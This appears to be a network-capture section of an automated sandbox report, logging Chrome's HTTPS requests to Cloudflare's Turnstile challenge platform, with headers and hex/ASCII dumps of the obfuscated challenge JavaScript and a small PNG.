                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 72 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 61 3d 65 2e 73 72 63 2c 6f 3d 61 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 72 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 57 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 70
                                                                                  Data Ascii: ript tag, some features may not be available",43777);var r={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(r.loadedAsync=!0);var a=e.src,o=a.split("?");return o.length>1&&(r.params=new URLSearchParams(o[1])),r}function W(){return typeof p
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 69 75 73 3d 22 35 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 78 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 78 2e 69 64 3d 65 2b 22 2d 66 72 22 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 67 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64
                                                                                  Data Ascii: ius="5px",s.style.left="0px",s.style.top="0px",s.style.overflow="hidden",s.style.margin="0px auto";var x=document.createElement("iframe");x.id=e+"-fr",x.setAttribute("src",g),x.setAttribute("allow","cross-origin-isolated; fullscreen"),x.setAttribute("sand


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.449764104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:44 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5d8159ce5185d&lang=auto HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:44 UTC301INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:44 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 125012
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d81a1c4b729f-EWR
                                                                                  2024-10-02 15:49:44 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30
                                                                                  Data Ascii: et%20containing%20a%20Cloudflare%20security%20challenge","turnstile_timeout":"Timed%20out","turnstile_feedback_description":"Send%20Feedback","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 48 28 32 33 33 29 29 2f 31 31 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 38 31 35 31 32 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 32 38 34 29 5d 2c 65 4d 5b 67 49 28 39 34 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 59 2c 65 29 7b 65 3d 28 67 59 3d 67 49 2c 7b 27 73 67 46 50 59 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 2c 27 6e 6c 6a 4e 66 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 67 7d 2c 27 47 79 61 54 7a 27 3a 67 59 28 37 35 34 29 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20
                                                                                  Data Ascii: H(233))/11),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,815123),eM=this||self,eN=eM[gI(1284)],eM[gI(948)]=function(c,gY,e){e=(gY=gI,{'sgFPY':function(g,h){return g(h)},'nljNf':function(g,h){return h!==g},'GyaTz':gY(754)});try{return
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 6b 3d 28 68 33 3d 67 49 2c 6a 3d 7b 7d 2c 6a 5b 68 33 28 31 31 36 35 29 5d 3d 68 33 28 31 31 30 31 29 2c 6a 5b 68 33 28 37 39 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 33 28 36 36 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 33 28 35 38 36 29 5d 3d 68 33 28 33 34 37 29 2c 6a 5b 68 33 28 31 34 32 32 29 5d 3d 68 33 28 31 36 31 35 29 2c 6a 5b 68 33 28 35 38 31 29 5d 3d 68 33 28 31 33 33 38 29 2c 6a 5b 68 33 28 32 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 69 7c 7c 6b 5b 68 33 28 31 31 36 35 29 5d 2c 6d 3d 65 4d 5b 68 33 28 31 34 32 31 29 5d 5b 68 33 28 39 38 38 29
                                                                                  Data Ascii: k=(h3=gI,j={},j[h3(1165)]=h3(1101),j[h3(795)]=function(F,G){return F+G},j[h3(668)]=function(F,G){return F+G},j[h3(586)]=h3(347),j[h3(1422)]=h3(1615),j[h3(581)]=h3(1338),j[h3(203)]=function(F,G){return F+G},j);try{if(l=i||k[h3(1165)],m=eM[h3(1421)][h3(988)
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 61 50 52 65 43 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 73 70 79 70 67 27 3a 68 34 28 39 32 36 29 2c 27 6a 65 73 72 62 27 3a 68 34 28 36 37 38 29 2c 27 70 52 61 7a 49 27 3a 68 34 28 33 36 35 29 7d 2c 69 3d 63 5b 68 34 28 34 32 38 29 5d 28 29 2c 6a 3d 68 34 28 31 31 35 39 29 2c 69 5b 68 34 28 37 34 39 29 5d 28 6a 29 3e 2d 31 29 65 4d 5b 68 34 28 31 37 38 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 35 29 7b 68 35 3d 68 34 2c 65 4d 5b 68 35 28 38 38 30 29 5d 28 29 7d 2c 31 65 33 29 3b 65 6c 73 65 20 69 66 28 68 34 28 32 36 30 29 3d 3d 3d 68 34 28 32 36 30 29 29 6b 3d 5b 68 34 28 38 35 39 29 2b 63 2c 68 5b 68 34 28 31 34 37 39 29 5d 28 68
                                                                                  Data Ascii: nction(l,m){return l(m)},'aPReC':function(l,m){return l+m},'spypg':h4(926),'jesrb':h4(678),'pRazI':h4(365)},i=c[h4(428)](),j=h4(1159),i[h4(749)](j)>-1)eM[h4(1780)](function(h5){h5=h4,eM[h5(880)]()},1e3);else if(h4(260)===h4(260))k=[h4(859)+c,h[h4(1479)](h
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 7b 7d 2c 65 56 5b 67 49 28 33 37 38 29 5d 3d 65 55 2c 65 4d 5b 67 49 28 31 37 35 39 29 5d 3d 65 56 2c 65 58 3d 65 4d 5b 67 49 28 31 34 32 31 29 5d 5b 67 49 28 39 34 37 29 5d 5b 67 49 28 31 32 33 31 29 5d 2c 65 59 3d 65 4d 5b 67 49 28 31 34 32 31 29 5d 5b 67 49 28 39 34 37 29 5d 5b 67 49 28 31 33 36 31 29 5d 2c 66 39 3d 21 5b 5d 2c 66 6d 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 49 28 37 35 37 29 5d 28 67 49 28 31 35 37 30 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 68 59 2c 64 2c 65 29 7b 68 59 3d 67 49 2c 64 3d 7b 27 51 69 61 6c 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 56 69 43 52 63 27 3a 68 59 28 32 34 36 29 2c 27 4c 63 71 71 43 27 3a 68 59 28 39 34 36 29 2c 27 73 77 71 54 72 27 3a 66 75 6e 63 74 69 6f 6e 28 66
                                                                                  Data Ascii: {},eV[gI(378)]=eU,eM[gI(1759)]=eV,eX=eM[gI(1421)][gI(947)][gI(1231)],eY=eM[gI(1421)][gI(947)][gI(1361)],f9=![],fm=undefined,eM[gI(757)](gI(1570),function(c,hY,d,e){hY=gI,d={'QialO':function(f){return f()},'ViCRc':hY(246),'LcqqC':hY(946),'swqTr':function(f
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 6a 68 3d 67 49 2c 64 3d 7b 27 63 4c 66 71 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4b 75 67 53 44 27 3a 6a 68 28 31 32 34 36 29 2c 27 72 6f 4a 62 79 27 3a 6a 68 28 31 35 33 38 29 2c 27 7a 6e 4c 4a 57 27 3a 6a 68 28 35 31 32 29 2c 27 57 4a 71 44 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 5a 72 44 73 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 5a 6c 65 68 63 27 3a 6a 68 28 31 36 38 36 29 2c 27 46 65 4e 59 55 27 3a 6a 68 28 35 39 36 29 2c 27 45 64 53 4f 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 48 49 58 61 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74
                                                                                  Data Ascii: jh=gI,d={'cLfqK':function(h,i){return h==i},'KugSD':jh(1246),'roJby':jh(1538),'znLJW':jh(512),'WJqDu':function(h,i){return h+i},'ZrDsi':function(h,i){return h==i},'Zlehc':jh(1686),'FeNYU':jh(596),'EdSOw':function(h,i){return h<i},'HIXaL':function(h,i){ret
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 57 54 52 61 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 6a 68 28 31 34 33 31 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 6a 69 29 7b 72 65 74 75 72 6e 20 6a 69 3d 6a 68 2c 64 5b 6a 69 28 32 34 30 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 6a 29 7b 72 65 74 75 72 6e 20 6a 6a 3d 6a 69 2c 6a 6a 28 34 34 32 29 5b 6a 6a 28 37 33 35 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 6c 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 51 2c 4c 2c 4d 2c 50 2c 52 2c 53 2c 54 2c 4e 29 7b 69 66 28
                                                                                  Data Ascii: h,i){return h-i},'WTRaG':function(h,i){return i===h}},e=String[jh(1431)],f={'h':function(h,ji){return ji=jh,d[ji(240)](null,h)?'':f.g(h,6,function(i,jj){return jj=ji,jj(442)[jj(735)](i)})},'g':function(i,j,o,jl,s,x,B,C,D,E,F,G,H,I,J,K,Q,L,M,P,R,S,T,N){if(
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 29 3b 49 3d 64 5b 6a 6c 28 32 39 34 29 5d 28 49 3c 3c 31 2c 64 5b 6a 6c 28 31 34 32 39 29 5d 28 4e 2c 31 29 29 2c 4a 3d 3d 64 5b 6a 6c 28 34 35 39 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 6a 6c 28 31 35 31 33 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 6a 6c 28 31 35 33 32 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 6a 6c 28 31 37 30 34 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 6a 6c 28 31 31 33 31 29 5d 28 78 2c 47 29 3b 49 3d 4e 26 31 7c 49 3c 3c 31 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 6a 6c 28 31 35 31 33 29 5d 28 64 5b 6a 6c 28 37 35 36 29 5d 28 6f 2c 49 29 29 2c 49 3d
                                                                                  Data Ascii: );I=d[jl(294)](I<<1,d[jl(1429)](N,1)),J==d[jl(459)](j,1)?(J=0,H[jl(1513)](o(I)),I=0):J++,N>>=1,x++);}E--,d[jl(1532)](0,E)&&(E=Math[jl(1704)](2,G),G++),delete C[D]}}else for(N=B[D],x=0;d[jl(1131)](x,G);I=N&1|I<<1,J==j-1?(J=0,H[jl(1513)](d[jl(756)](o,I)),I=
                                                                                  2024-10-02 15:49:44 UTC1369INData Raw: 31 35 39 30 29 5d 28 6a 2c 31 29 29 7b 48 5b 6a 6c 28 31 35 31 33 29 5d 28 64 5b 6a 6c 28 31 30 39 31 29 5d 28 6f 2c 49 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 6a 6c 28 39 35 32 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 6a 6e 29 7b 72 65 74 75 72 6e 20 6a 6e 3d 6a 68 2c 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 27 27 3d 3d 68 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 6a 6e 28 31 33 38 31 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 6f 29 7b 72 65 74 75 72 6e 20 6a 6f 3d 6a 6e 2c 68 5b 6a 6f 28 39 37 34 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 70 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e
                                                                                  Data Ascii: 1590)](j,1)){H[jl(1513)](d[jl(1091)](o,I));break}else J++;return H[jl(952)]('')},'j':function(h,jn){return jn=jh,null==h?'':''==h?null:f.i(h[jn(1381)],32768,function(i,jo){return jo=jn,h[jo(974)](i)})},'i':function(i,j,o,jp,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.449765104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:44 UTC795OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:45 UTC210INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:44 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  cache-control: max-age=2629800, public
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d81c099e42cf-EWR
                                                                                  2024-10-02 15:49:45 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.449766104.18.94.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:45 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5d8159ce5185d&lang=auto HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:45 UTC301INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:45 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 119609
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d81fb8b418c0-EWR
                                                                                  2024-10-02 15:49:45 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 52 65 66 72 65 73 68 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22
                                                                                  Data Ascii: sh_link%22%3ERefresh%3C%2Fa%3E","turnstile_expired":"Expired","human_button_text":"Verify%20you%20are%20human","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_description":"
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 32 34 37 29 29 2f 31 31 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 38 39 35 38 30 30 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 34 38 31 29 5d 2c 65 4d 5b 67 49 28 31 31 33 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 51 28 63 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 65 4f 28 65 50 28 63 29 29 7d 7d 2c 65 52 3d 5b 5d 2c 65 53 3d 30 3b 32 35 36 3e 65 53 3b 65 52 5b 65 53 5d 3d 53 74 72 69 6e 67 5b 67 49 28 31 34 39 39 29 5d 28 65 53 29 2c 65 53 2b 2b 29 3b 65 54 3d 28 30 2c 65 76 61 6c 29 28 67 49 28 34 33 36 29
                                                                                  Data Ascii: 247))/11),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,895800),eM=this||self,eN=eM[gI(1481)],eM[gI(1134)]=function(c){try{return eQ(c)}catch(e){return eO(eP(c))}},eR=[],eS=0;256>eS;eR[eS]=String[gI(1499)](eS),eS++);eT=(0,eval)(gI(436)
